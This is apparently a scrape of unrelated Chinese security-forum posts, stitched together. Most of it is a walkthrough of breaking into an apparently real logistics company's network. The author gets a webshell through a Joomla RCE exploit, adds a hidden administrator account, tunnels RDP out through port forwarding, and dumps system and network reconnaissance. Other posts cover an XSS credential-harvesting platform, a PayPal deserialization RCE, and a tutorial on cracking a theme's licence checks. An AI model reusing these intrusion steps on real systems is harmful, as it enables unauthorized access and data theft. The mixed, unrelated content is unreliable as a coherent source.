首先JAVA中的类方法不像php的函数中有那么多的漏洞。

java源代码安全文章主要是总结一下,学习一下,希望大家多多指教。

Java源代码安全系列文章,将从java本身的函数和三大主流框架的角度去对项目中的类、方法、参数可能存在的漏洞进行实现,方便代码审计中的学习,结合一些半自动化审计工具,发现项目中的安全问题,给出一些关键字方便审计时的直接定位。

MVC请参考我园长师傅的:http://drops.wooyun.org/tips/347
JavaWeb安全系列:http://drops.wooyun.org/author/%E5%9B%AD%E9%95%BF

小弟不才,有建议大家多提一下,多多学习。

在框架和jdk中有很多的SQL查询实现类,拼接查询、占位符查询、参数化绑定查询很多,但是目前大多数框架已尽采用了占位符查询(为了安全同时也为了性能的提升),但是依然有一些开发人员在框架中使用拼接查询,造成了安全问题的产生,给公司带来不可避免的损失。

JAVA JDK中的Statement和PreparedStatement

java.sql.Statement  拼接查询 java.sql.PreparedStatement   预编译查询 java.sql.Connection.prepareCall  调用存储过程 ( 不尽兴过多描述)

1、Statement查询

图片 1.png

图片 2.png

图片 3.png

2、PreparedStatement查询

图片 4.png

图片 5.png

Spring框架中JDBC查询

org.springframework.jdbc.core.JdbcTemplate  jdbc模版类

在Spring框架中有很多的数据库实现类,比如:org.springframework.jdbc.core.JdbcOperations、org.springframework.jdbc.core.PreparedStatementCreatorFactory、org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate、org.springframework.jdbc.core.simple.SimpleJdbcTemplat等等,于是我们只需要去找到实现数据库会话类,通过查询哪些类调用了数据库查询会话类即可。

因为Spring Jdbc中涉及到大量的sql查询类,不一一进行描述说明,大部分还是依赖JdbcTemplate,但是我们一定要知道JdbcTemplate类内部还是根据DataSourceUtils来获取数据库连接的。

图片 6.png

图片 7.png

图片 8.png

Hibernate框架

org.hibernate.SessionFactory   工厂类实例,用来创建Session org.hibernate.Session    查询的Session,一个数据库会话 org.hibernate.Query    查询语句类

图片 9.png

图片 10.png

图片 11.png

避免的标准格式有很多,当我们看到这些方式可以绕过,不排除有二次查询漏洞的产生。
1、参数绑定方式查询
2 、占位符方式查询
3、setParameter()方法
4、setProperties()方法(根占位符区别不大)

在审计过程中我们完全可以依赖Eclipse Search功能来进行定位或搜索我们需要的类、方法或常量变量

图片 12.png

看雪上瞅见的:
http://bbs.pediy.com/showthread.php?t=207511

功能:

1、支持微信、QQ自动抢红包

2、支持手机待机下自动抢红包

3、优化代码,抢红包更快、更稳

源码:

https://github.com/WooyunDota/QiangHongBao

曾经发过一次开源的xss平台
http://zone.wooyun.org/content/23697

更新至3.1,算是一个稳定版本吧,预期的功能已都实现,详细介绍可以看github里的README.md

特点:单用户,无sql,安装及其方便,对环境几乎无要求,可直接在php虚拟空间使用
(如果需要keepsession需要curl支持,sae可自行修改下keepsession.php即可)

主要功能
xss记录:记录所有收到的get、post、cookie以及header,ip归属地等信息,支持base64检测自动解码 js公用模板,我的js:可以直接添加修改js,采用ace编辑器,支持js语法高亮,语法错误检查,在编辑器里可直接代码格式化与最小化,集成xssor部分功能,方便生成payload, 新消息提醒:仿QQ邮箱新消息提醒框 邮件通知 安全方面考虑:开启csp,挑战应答式登录,密码输错5次封ip,session与ip、useragent绑定 自带部分js模板(来自各大xss平台,除了前先天正好想研究下截图自己写了个,当然前人早就做了类似的了)

展示下界面好了
login.png
mainpanel.png
myjs.png
jstemplate.png
xssor.png

=======================================================
源码地址https://github.com/firesunCN/BlueLotus_XSSReceiver
=======================================================
如果觉得不错。。star下可好

 

原文:http://artsploit.blogspot.com/2016/01/paypal-rce.html
在去年12月国外安全研究员发现了一个manager.paypal.com的java序列化漏洞并报告给了paypal进行修复.
这个漏洞异于之前大家发的weblogic jboss websphere等序列化漏洞,并不是直接对某个rmi直接POST带有攻击的payload。

漏洞详情:
当漏洞发现者对manager.paypal.com站进行安全测试的时候留意到有一个表单请求里有个oldForm参数base64解码后疑似一个java的object。
1.png
经过分析后确认这个参数可以接受一个未经任何验证的java序列化后的object。意味着可能存在之前的apache commons collections序列化漏洞,机智的作者利用ysoserial生成payload测试后发现果然存在此漏洞.

通过执行shell命令,测试是否能发送DNS请求和HTTP请求到他自己的服务器:
2.png
通过对oldFormData参数base64编码后作者真的在自己的nginx日志里找到了来自PayPal的请求,下面是访问日志截图:
3.png

由此可以确认manager.paypal.com存在序列化漏洞,这个时候通常可以读取或者在PayPal的服务器上执行任意的命令了。
比如读取/etc/passwd的文件内容:
4.png

作者录了个视频并发给了PayPal获的了奖励。

这个漏洞告诉我们关注weblogic jboss...的同时也可以多留意下某些业务参数,或许也发现意外的惊喜。

这款软件2014年上架的时候我就首发汉化了,但是当时很多bug,确实用起来很不方便。现在一年多时间洗礼,相信你也会喜欢这个功能强大的应用。软件名称:     jimdo   软件语言: 原版截图

 

 

汉化版操作方式直播!

★打开软件后,选择新创建一个网站,左右滑动,挑一个喜欢的模板

 

★★★这里随意输入你喜欢的名字,作为日后访问你网站的域名。,然后点击下一个

 

★这里输入你的谷歌帐号。

如果没有的话需要自己先去创建一个哦,因为谷歌帐号用处很多,需要自己注册一个方便其它用途。

★★★好,输入完后点击下一个,接着输入谷歌帐号密码,再点击下一个

★然后就初步设置好了。等待创建成功!

这个过程要等好几分钟,根据网速决定。

这里跟大家说一下,不需要挂VPN创建,你什么都不用操作,等一下下就行了,不要画蛇添足~

 

 

OK,创建成功。

左上角功能键是帐号和你的多个网站显示。你刚刚开始所以只有一个网站。

右上角功能键是模板编辑,添加/删减/调整/图片编辑等

 

 

_______________________________________________________________________________________________________

_______________________________________________________________________________________________________

          键盘文字图制作、分割字、心形字等等几十种特效一键生成!            

 

 

 

 

 

 

 

文字键盘制作:链接:http://pan.baidu.com/s/1pKkUwZ5 密码:nkgi
JIMDO汉化版:链接: http://pan.baidu.com/s/1i42cahR 密码: 369i

0x00 前言

最近,因为工作原因一直也没时间更新博客。好不容易忙完了一阵,眼看就要过年了,先提前祝大家新年快乐!

很多时候,在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实,个人感觉一个完整的渗透(从黑客的角度去思考问题)应该是以尽一切可能获取目标的系统或者服务器的最高权限,尽可能的发现足够多的敏感信息。这个过程应该包括但不限于以下几个方面:

信息刺探: 待渗透目标的系统,人员,组织信息等
漏洞侦测: 所有与待渗透目标相关的系统的漏洞侦测
系统提权: 利用现有的信息对已经获取的系统进行提权从而获取最高控制权限
内网渗透: 利用以获取的系统作为跳板进一步扩大战果,重复以上三步获取更多的系统权限和内网敏感信息

下面,是我分享地一个相对完整的渗透实战,仅供大家交流参考,所有的操作在本文公开以前均已恢复,请大家切勿用于非法目的。

0x01 信息刺探

作为渗透测试的第一步,也是最重要地一步便是信息刺探。孙子兵法有云:“知己知彼,百战不殆”。

首先是选择实战的目标站点,搜集到的信息如下:

URL: http://***.**.cn/ 外网IP地址:58.246.**.** 开放的端口(nmap): 80, 443 注册信息(whois): Domain Name: ***.sh.cn Registrant: 上海*****物流有限责任公司 Registrant Contact Email: cs@onlinebusiness.com.cn Sponsoring Registrar: 北京中科三方网络技术有限公司 Name Server: f1g1ns1.dnspod.net Name Server: f1g1ns2.dnspod.net Registration Time: 2001-07-26 00:00:00 Expiration Time: 2022-07-26 00:00:00 子域名信息: 116.236.199.**   mail2.***.sh.cn 180.166.3.**      import.***.sh.cn 58.246.81.**      query.***.sh.cn 58.246.81.**      mail.***.sh.cn 邮箱: liunian@***.sh.cn

从以上搜集到的信息,我们可以简单的分析一下接下来的渗透思路:

查找主站漏洞并利用
利用子站漏洞旁注进入系统搜集更多有用信息

0x02 漏洞侦测

按照上面的思路首先尝试寻找主站的漏洞,通常可通过AWVS或者其他的扫描工具做初步的扫描,看看会不会有可以利用的点。但是最简单直接的方法是打开这个站点,尽可能仔细的浏览每一可能有价值的页面,如下:
20160127095701_41461.png
有没有发现,其实我们可以观察到一些很有价值的信息。从上面的信息,我们可以发现这个主站是基于Joomla CMS的,这个其实对我们接下来的渗透很有帮助,我们都知道最近爆出了Joomla的RCE和SQL注入漏洞,那么我们就可以去尝试看看这个站是否修复了这些漏洞。

于是,我们可以使用已经公开的exp(http://avfisher.win/archives/287)对其进行测试, 如下所示:
rce_joomla.png

[+] vuls found! url: http://***.sh.cn/, System: Windows NT EESTSWEB01 6.1 build 7601 (Windows Server 2008 R2 Enterprise Edition Service Pack 1) i586 , document_root: C:/xampp/htdocs/*** , script_filename: C:/xampp/htdocs/***/index.php , shell_file: http://***.**.cn/***/****/1ndex.php

果然漏洞确实存在,而且我们也顺利地getshell了,那么是不是意味着我们的渗透已经结束了呢?no,no,no(重要的事情说3遍),其实真正的渗透才刚刚开始。

0x03 系统提权

我们发现这是一个Windows 2008 R2的服务器,既然我们已经拿到了webshell,接下来考虑的事情就应该是,我能不能获得管理员权限?

首先,在菜刀中执行命令: whoami 看看现在的shell是在什么权限下运行的,如下:
20160127140615_58005.png
可以看出我们的shell是在system权限下运行的,那么也就表示我们可以很容易的添加一个管理员帐户,命令如下:

net user administer <password> /add net localgroup administrators administer /add
20160127141104_87267.png

0x04 内网渗透

接下来,我们就需要经一步查看和收集系统的一些常见信息来帮助我们进一步的内网渗透,通常包括以下信息:

1. 系统信息 – systeminfo

主机名:           EESTSWEB01 OS 名称:          Microsoft Windows Server 2008 R2 Enterprise OS 版本:          6.1.7601 Service Pack 1 Build 7601 OS 制造商:        Microsoft Corporation OS 配置:          独立服务器 OS 构件类型:      Multiprocessor Free 注册的所有人:     Windows 用户 注册的组织: 产品 ID:          00486-OEM-8400691-20006 初始安装日期:     2015/5/14, 22:54:49 系统启动时间:     2015/8/3, 16:20:27 系统制造商:       Microsoft Corporation 系统型号:         Virtual Machine 系统类型:         x64-based PC 处理器:           安装了 2 个处理器。 [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1598 Mhz [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1598 Mhz BIOS 版本:        American Megatrends Inc. 090006 , 2012/5/23 Windows 目录:     C:\Windows 系统目录:         C:\Windows\system32 启动设备:         \Device\HarddiskVolume1 系统区域设置:     zh-cn;中文(中国) 输入法区域设置:   zh-cn;中文(中国) 时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐 物理内存总量:     2,048 MB 可用的物理内存:   576 MB 虚拟内存: 最大值: 4,095 MB 虚拟内存: 可用:   2,647 MB 虚拟内存: 使用中: 1,448 MB 页面文件位置:     C:\pagefile.sys 域:               WORKGROUP 登录服务器:       暂缺 修补程序:         安装了 1 个修补程序。 [01]: KB976902 网卡:             安装了 1 个 NIC。 [01]: Microsoft 虚拟机总线网络适配器 连接名:      本地连接 启用 DHCP:   否 IP 地址 [01]: 192.168.0.10 [02]: fe80::98f7:e8a:3eeb:ff6

2. IP信息 – ipconfig /all

Windows IP 配置 主机名  . . . . . . . . . . . . . : EESTSWEB01 主 DNS 后缀 . . . . . . . . . . . : 节点类型  . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft 虚拟机总线网络适配器 物理地址. . . . . . . . . . . . . : 00-15-5D-00-02-01 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::98f7:e8a:3eeb:ff6%11(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.0.10(首选) 子网掩码  . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 192.168.0.230 DHCPv6 IAID . . . . . . . . . . . : 234886493 DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1C-E6-6D-9C-00-15-5D-00-02-01 DNS 服务器  . . . . . . . . . . . : 192.168.0.1 TCPIP 上的 NetBIOS  . . . . . . . : 已启用 隧道适配器 isatap.{ADD2E201-9C5D-480F-8E29-F722627ABA6E}: 媒体状态  . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 隧道适配器 Teredo Tunneling Pseudo-Interface: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:7834:496d:18cf:134e:3f57:fff5(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::18cf:134e:3f57:fff5%18(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS  . . . . . . . : 已禁用

3. 开放的端口信息 – netstat -an

活动连接 协议  本地地址          外部地址        状态 TCP    0.0.0.0:80             0.0.0.0:0              LISTENING TCP    0.0.0.0:135            0.0.0.0:0              LISTENING TCP    0.0.0.0:443            0.0.0.0:0              LISTENING TCP    0.0.0.0:445            0.0.0.0:0              LISTENING TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING TCP    0.0.0.0:10050          0.0.0.0:0              LISTENING TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING TCP    192.168.0.10:80        125.39.30.131:11235    ESTABLISHED TCP    192.168.0.10:139       0.0.0.0:0              LISTENING TCP    192.168.0.10:10050     192.168.0.11:40635     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40637     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40645     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40656     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40755     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40786     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40798     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40811     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40829     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40945     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40980     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40986     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:40991     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41006     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41115     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41148     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41161     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41171     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41187     TIME_WAIT TCP    192.168.0.10:10050     192.168.0.11:41306     TIME_WAIT TCP    [::]:80                [::]:0                 LISTENING TCP    [::]:135               [::]:0                 LISTENING TCP    [::]:443               [::]:0                 LISTENING TCP    [::]:445               [::]:0                 LISTENING TCP    [::]:3306              [::]:0                 LISTENING TCP    [::]:3389              [::]:0                 LISTENING TCP    [::]:10050             [::]:0                 LISTENING TCP    [::]:47001             [::]:0                 LISTENING TCP    [::]:49152             [::]:0                 LISTENING TCP    [::]:49153             [::]:0                 LISTENING TCP    [::]:49154             [::]:0                 LISTENING TCP    [::]:49155             [::]:0                 LISTENING TCP    [::]:49156             [::]:0                 LISTENING TCP    [::]:49157             [::]:0                 LISTENING TCP    [::1]:3306             [::1]:65055            TIME_WAIT TCP    [::1]:3306             [::1]:65056            TIME_WAIT TCP    [::1]:3306             [::1]:65057            TIME_WAIT TCP    [::1]:65055            [::1]:3306             TIME_WAIT TCP    [::1]:65056            [::1]:3306             TIME_WAIT TCP    [::1]:65057            [::1]:3306             TIME_WAIT TCP    [::1]:65058            [::1]:3306             TIME_WAIT TCP    [::1]:65059            [::1]:3306             TIME_WAIT UDP    0.0.0.0:500            *:* UDP    0.0.0.0:4500           *:* UDP    0.0.0.0:5355           *:* UDP    192.168.0.10:137       *:* UDP    192.168.0.10:138       *:* UDP    [::]:500               *:* UDP    [::]:4500              *:* UDP    [::]:5355              *:*

4. 运行的进程信息 – tasklist

映像名称                       PID 会话名              会话#       内存使用 ========================= ======== ================ =========== ============ System Idle Process              0 Services                   0         24 K System                           4 Services                   0        364 K smss.exe                       492 Services                   0      1,612 K csrss.exe                      576 Services                   0      8,184 K wininit.exe                    628 Services                   0      5,884 K services.exe                   728 Services                   0     13,224 K lsass.exe                      736 Services                   0     27,344 K lsm.exe                        744 Services                   0      7,500 K svchost.exe                    836 Services                   0     11,872 K svchost.exe                    916 Services                   0      9,888 K svchost.exe                   1000 Services                   0     22,876 K svchost.exe                    192 Services                   0     46,352 K svchost.exe                    592 Services                   0     17,884 K svchost.exe                    520 Services                   0     22,124 K svchost.exe                    932 Services                   0     21,616 K svchost.exe                   1084 Services                   0     14,688 K spoolsv.exe                   1248 Services                   0     20,832 K vmicsvc.exe                   1280 Services                   0      7,188 K vmicsvc.exe                   1332 Services                   0     10,788 K vmicsvc.exe                   1356 Services                   0      5,200 K vmicsvc.exe                   1384 Services                   0      5,540 K vmicsvc.exe                   1408 Services                   0      5,464 K httpd.exe                     1456 Services                   0     18,144 K svchost.exe                   1492 Services                   0     10,124 K mysqld.exe                    1540 Services                   0    474,496 K svchost.exe                   1636 Services                   0      3,740 K zabbix_agentd.exe             1708 Services                   0      8,416 K httpd.exe                     2064 Services                   0    204,668 K svchost.exe                   2748 Services                   0     10,340 K svchost.exe                   2784 Services                   0      6,744 K svchost.exe                   2716 Services                   0      5,560 K msdtc.exe                      572 Services                   0      8,416 K csrss.exe                     3428 Console                    2      7,100 K winlogon.exe                  2704 Console                    2      5,892 K LogonUI.exe                   3052 Console                    2     17,080 K mmc.exe                       1124 Services                   0     38,828 K csrss.exe                     1808 RDP-Tcp#0                  1     17,060 K winlogon.exe                   812 RDP-Tcp#0                  1      7,704 K taskhost.exe                  5040 RDP-Tcp#0                  1      8,212 K rdpclip.exe                   3608 RDP-Tcp#0                  1      8,072 K dwm.exe                       4772 RDP-Tcp#0                  1      7,032 K explorer.exe                  4968 RDP-Tcp#0                  1     79,612 K cmd.exe                       4920 RDP-Tcp#0                  1      3,820 K conhost.exe                   4624 RDP-Tcp#0                  1      6,052 K xampp-control.exe             4364 RDP-Tcp#0                  1     15,992 K taskmgr.exe                   4548 RDP-Tcp#0                  1     12,048 K TrustedInstaller.exe          3188 Services                   0      9,748 K cmd.exe                       3920 Services                   0      4,016 K conhost.exe                   3944 Services                   0      3,668 K cmd.exe                       2988 Services                   0      4,028 K tasklist.exe                  5036 Services                   0      6,148 K WmiPrvSE.exe                  3620 Services                   0      7,556 K

5. 局域网中公开的文件共享 – net view

服务器名称            注解 ------------------------------------------------------------------------------- \\EESHQAP02 \\EESHR                eeshr \\EESTS006 \\EESTSWEB01           Web Server \\EESTSWEB02 \\EESWEBSQL02 \\FORLOG               forlog share \\FORLOG-IIS \\JERRY                JERRY \\SMILINGM-2511FC 命令成功完成。

6. 局域网中的域的信息 – net view /domain

Domain ------------------------------------------------------------------------------- EES WORKGROUP 命令成功完成。

分析并提取有用信息:
主机名: EESTSWEB01
内网IP: 192.168.0.10
内网网关: 192.168.0.230
操作系统: Windows 2008 R2
所在域: WORKGROUP
杀毒软件:未发现
WEB服务器组件: XAMPP
端口: 80(HTTP), 3306(MySQL), 3389(RDP)
局域网所有的域: EES, WORKGROUP

 

根据上面的分析,我们发现目标服务器已经开放了RDP(3389)但是服务器是在内网我们无法直接外连。既然如此,我们可以考虑端口转发到我们自己的外网服务器然后在连接。

第一步, 上传端口转发工具(可以参考http://avfisher.win/archives/318)
11111.png
第二步,外网服务器开启端口监听端口5001和5002
22222.png
第三步,内网服务器开启端口转发,将本地端口3389转发到外网服务器监听的端口5002上
33333.png
第四步,发起RDP外连外网服务器的端口5001
4.png
现在,我们已经成功地利用端口转发并RDP连接到了内网这台服务器上了。

打开XAMPP,我们可以很容易的查看网站的数据库数据:
x.png
为了进一步渗透内网,我们需要对内网进行扫描,看看内网开启了哪些服务,这里我推荐一款快速扫描内网的工具(MyLanViewer),结果如下:
m.png
m2.png
内网的一些共享目录:(各种内部资料和信息)
i.png
i2.png
i3.png
一些内网的系统:
私有云云存储管理系统:(可以为共享目录设置权限)
s1.png
无线路由器:(内网流量嗅探和截取)
s2.png
打印机:(获取到了部分企业联系人的通讯录)
s3.png
s4.png
事实上,至此整个渗透仍旧没有结束,我们目前只是获得了一台WORKGROUP的服务器,而实际上仍旧有10几台服务器在EES域里,那么我们接下来该怎么突破呢?

其实可利用的思路还有很多,比如:

1. 结合上面我们在内网扫到的通讯录以及我们之前搜集到的子域名邮箱 mail.***.sh.cn(见0x01),我们可以先根据邮箱地址生成一个密码字典进行暴力破解,看看能不能在用户的邮箱中获取其他有用的信息

2. 继续挖掘和分析其他的子站可能存在的漏洞继而逐步突破

3. 尝试破解上面获得的无线路由器密码嗅探网络流量获取企业员工的用户名和密码

在此就不再深入下去了!总之,渗透是一门特别的艺术,必须善于运用一切已获取的信息不断变换思路最终达成目的。

0x05 总结

渗透是一个特别需要经验,细心和耐心的工作,你必须从黑客的角度去考虑每一个可能存在的漏洞进而利用并扩大战果。

总结上面的这次实战的结果,可以简单概括成以下几点:

耐心: 必须有足够的耐心去搜集目标的一切可能相关的信息
细心: 仔细地观察和了解你的目标,不放过每一个细节,从细节中获得突破口
思路: 善于总结和归纳所有的已知信息,并结合在平时积累的各种渗透思路进一步扩大战果
总结: 把每次实战中接触和学习到的东西总结起来并从中提取出实用的思路以便下次实战中的再次利用

原文地址

【前言】
Wind Punish网络安全团队翻译部的第一部作品终于诞生了,我们选择了密码学中经典的漫画《Alice and Bob》,作为我们的第一个项目。
Alice和Bob这一对情侣,就像是学校里英文教科书中的李雷和韩梅梅一样,他们奇妙而平凡的生活,陪伴许多人走过了学习的历程,如果没有Alice和Bob,
你会在密码学教科书上看到这样的描述:A 与某个声称自己是 B 的人通信。为了确保无误,A 必须先看看 B 是否知道密码 K。因此 A 向 B 发送了一段随机的 X,B 用 K 将 X 加密后得到 Y 并将 Y 回传给 A。
这只是密码学中一段非常简短的讲义,试想以下,如果在复杂的逻辑,混乱的符号下,密码学中的一些描述,将会让人十分头疼,但是正是因为有了Alice和Bob,他们甜蜜的情侣故事,他们生动可爱的漫画形象,让密码学中复杂的过程,变得清晰,简洁,正是因为有了他们,密码学变得那么亲切,所以Gordon先生才会自嘲地说,现在没人知道他在密码学上的成就(强素数概念的提出),提起他都是说“那个八卦 Alice 和 Bob 的家伙”。
我们翻译的这幅漫画,只是众多Alice和Bob故事中的一个,我们认为,我们翻译的不仅仅是一幅漫画,更是一种情怀,就像李雷和韩梅梅一样,代表了许多人学习时的记忆与情怀,这是一种特殊的意义。同时,我们认为Alice和Bob的漫画,代表了一种将知识与技术更有效,更智慧的传播的信念,也许我们的第一幅作品很短,但是,知识的意义,在与她的本质与灵魂,我们希望Wind Punish翻译部的第一幅作品,能作为我们一个良好的起点,未来,我们会由浅入深,为大家带来更多,更好的作品,欢迎大家关注我们Wind Punish网络安全团队翻译部!
最后,我们希望谨以此漫画,送给每一个曾经在密码学领域探索过的人,送给我们都有过的那一段,为了密码学探索过程中的困难而懊恼,为了破译出一个密码而喜悦的岁月,也送给我们都憧憬着的那一份美好的未来……
【作品】
漫画原版:
http://abstrusegoose.com/113

346.png

漫画中文版:

251.jpg

漫画解读:
爱丽丝和鲍勃是密码学里面很著名的人物,我们认为漫画深层的含义在于,没有私钥,密文确实很难被破译 但并非不能破译,依赖于现有机器,需要花费很长的时间,也是可能破译出来,RSA就是这样的例子,以前1024位的RSA破译是不现实的,但现在的确可以被破译了。安全或许只是相对的,没有绝对的安全,总有一天会被“破解”,真正的安全在于使用者自身的安全意识,用强度高的加密算法,信息就相对安全性高一点。

项目负责人: Wind Punish网络安全团队核心成员,翻译部负责人ziwen

漫画译者:   Wind Punish网络安全团队核心成员,翻译部负责人ziwen
Wind Punish网络安全团队成员sunshine
Wind Punish网络安全团队成员 海风

美术编辑:   Wind Punish网络安全团队统筹部成员 神秘

技术顾问:   Wind Punish网络安全团队核心成员,开发部负责人 in2

欢迎大家提供建议,我们相信,没有完美的作品,但我们会努力向着完美前进!欢迎大家关注我们Wind Punish网络安全团队翻译部的新作品,以及WP未来的其他项目!

【Wind Punish(风惩) 网络安全团队简介】:
团队官网: www.windpunish.net 
团队精神: 自由 共享 信仰 
团队宣传: 以风的力量 风的速度 惩戒有罪之人 
如果错过了一些辉煌,那么这一次就不要错过WP的成长! 
我们的优势:成员来自乌云,补天,习科等知名漏洞响应平台, 
                    黑客团队,优秀的氛围,原创资料工具的一手获取 
                    团队一切活动将由团队成员投票决定
346logo.png

【名家点评】
http://localhost-8080.com/2014/02/story-of-alice-and-bob/
http://www.matrix67.com/blog/archives/1358

 

 


课程简介也许,你做了一个网站,却因为不懂SEO优化,不懂推广,而荒废掉了?也许,你做了一个网站,却因为无人维护、无人更新,没有任何收益?也许,你做了一个微信公众帐号,迟迟看不到经济效益,就放弃了?有没有一个更简单的,人人可以操作的网络工具,来帮助你的业务提升呢?答案是:有的,就是你我每天都在使用的QQ。        很多人都有自己的QQ,但是仅仅局限于聊天,传个资料,没有发现QQ的潜在营销价值,对于一些商家和个人来讲,最经济适用的就是QQ营销了,因为所有的一切基本都是免费的。想让你的QQ成为您的营销利器吗?您知道如何快速打造一个可以赚钱的QQ空间吗?只要你拥有一个QQ,任何人通过3个小时的学习,都可以把你的QQ打造成为你的24小时提款机。

链接: http://pan.baidu.com/s/1eRwbDpo 密码: 8b47

 

PS:千里之行始于足下,只有做才能成功

又是一个通宵,刚出去吃过早饭,视频教程也上传完毕。
一直说给各位来录制一个知更鸟begin主题的破解教程,但是一直没录制,前两天刚拿到最新版本的1.8版本主题包,正好有了原版主题包,所以就给各位录制一下,如何破解吧!
虽然1.8版本的主题增加了三个主题授权判断,但是不影响,旧版本的破解教程也是这样,只是去除了 后面的三个文件判断文件!!!!
视频是上传到乐视云点播里的,可能会出现转码后造成不清晰的问题,自己也观看了一边,的确有点不清晰,但是呢我博客里有文字版的破解教程,可以搭配来看!
博客地址就不发了,防止被版主认为打广告,另外此次发布的破解教程不提供主题包,所以有需要练手的朋友可以自行寻找原版主题进行破解练手!!

视频地址:http://yuntv.letv.com/bcloud.htm ... =640&height=360

依旧是不知道此板块如何贴视频。。。还是发视频连接吧,自己打开看吧1

一、打开 www.weidian.com,注册一个“微店”的帐号。已有的可以直接登录。

 

二、申请开通一个微店。

 

三、点击左侧导航下方的【加入购物号】

 

四、点击【前往QQ购物号】,使用你的QQ登录。

 

五、根据自己的条件,选择对应的类型。

个人和企业均可注册QQ购物号,所需资料和微信公众号基本一样。填写完资料,以后等待审核。

这里特别说明下这个版本和其他的版本的区别:1:支持微信连wifi的功能了,可以直接让用户自动选择关注微信公众号了。支持中文ssid
2:去掉了商户显示在线用户ip的功能,改为了显示在线用户是属于哪个路由器终端ID。可以在商户的路由管理处直接查看对应路由器,方便查询究竟我上网的用户是属于哪一个终端。

测试截图:

 

 

安装说明:
服务器要求:win2003或2008  iis或apache mysql5.1及以上 php5.2及以上 要支持伪静态
导入根目录下的数据库文件:www.52pojie.cn.sql
修改数据库配置文件:conf/db.php及site.php两个文件
商家登陆地址:域名/index.php
平台登陆地址:域名/ptadmin    用户名:admin 密码:admin
代{过}{滤}理商登陆地址:域名/dladmin
注意:如果以上2个链接打不开请检查你服务器的伪静态是否配置好(如果伪静态正常这2个链接是可以正常打开的),伪静态有问题以后的手机认证也会有问题的。

路由器wifidog协议配置:
认证服务器为你的服务器域名,认证端口为你服务器的端口, 认证路径为 / ,节点名称:你的路由的wan口的mac地址去掉冒号。

商家管理平台配置:
登陆商家管理平台,在路由管理->增加路由,名称自己定义,mac为你的路由的wan口的mac地址去掉冒号,路由器IP地址为你的路由器管理的IP地址,路由器网关portal端口为你的路由器的认证端口,可以先不管默认3000后保存,然后用手机测试,打开手机浏览器随便打开个网址,就会出现认证界面,这时看下手机浏览器的地址栏上面显示的地址port后面跟的那一组数字就是portal端口,记住后去商家管理平台路由管理->编辑路由填上正确的portal端口保存即可(如果此portal端口填写错误会导致微信一键认证不通过的)。

如果登陆时 提示 服务器忙 ,请检查数据库是否配置好。

以下2种方式不需要在路由器里加白名单就可以微信认证了:
微信认证页面,点立即认证后可临时上网(上网时长 在 “应用设置"->临时上网时间 里设置),这时会跳转到设置的微
信名称和二维码界面,这时手动打开微信,加关注微信后 回复 设置的关键词 收到回复的链接后点击链接就可认证成功。

微信密码认证页面,点去微信获取密码后可临时上网(上网时长 在 “应用设置"->临时上网时间 里设置),这时会跳转到设置的微信名称和二维码界面,这时手动打开微信,加关注微信后 回复 设置的关键词 收到回复的密码,再打开刚才的认证页面把密码输入进去点确认登陆就可以了。

短信认证内容模板:您好,欢迎光临本店,您的验证码是:$code,请在3分钟内完成验证,祝您购物愉快!
接收到短信后$code的位置就是密码。

如果应用设置里设置的手机认证短信选择了短信验证,那么在注册界面和手机登陆界面获取验证码都是需要真实的短信来验证,需要先在营销管理 短信账号管理,注册账号充值,在应用设置里设置短信认证内容后,才能正常获取短信验证码。

